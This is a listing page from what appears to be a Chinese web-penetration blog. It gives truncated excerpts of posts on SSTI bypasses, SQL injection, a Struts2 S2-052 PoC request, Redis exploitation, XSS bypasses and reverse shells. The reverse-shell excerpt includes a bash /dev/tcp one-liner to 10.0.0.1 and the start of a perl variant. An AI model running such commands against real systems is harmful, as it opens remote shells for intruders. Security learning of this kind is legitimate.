分类 Web渗透 下的文章:

Flask/Jinja2模板注入中的一些绕过姿势
发表于: | 分类: Web渗透,技术分享 | 评论:1 | 阅读: 3589
好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取pytho...

阅读全文>>

SQL注入备忘手册(更新2017-12-11)
发表于: | 分类: Web渗透,技术分享 | 评论:10 | 阅读: 3716
SQL备忘录,平时查阅用,随时更新。1 MySQL1.1 常用信息及语句当前用户:user() 数据库版本:version() 数据库名: database() 操作系统:@@version_compile_os 所有用户: select group_c...

阅读全文>>

S2-052 POC
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1434
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1 Host: 192.168.2.108:8080 User-Agent: Mozil...

阅读全文>>

利用order by 进行盲注
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 2267
0x01 利用场景登录代码:$username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql=&quo...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 4138
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1493
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1374
0x00 前言本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家0x01 分析1、无安全方面的限制,直接使用关键代码:<?php @$id = $_GET['id']; echo $id;payload:<script>...

阅读全文>>

PHP变量覆盖漏洞总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1565
一、全局变量覆盖当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。<?php echo "Register_globals: ".(int)ini_get("regist...

阅读全文>>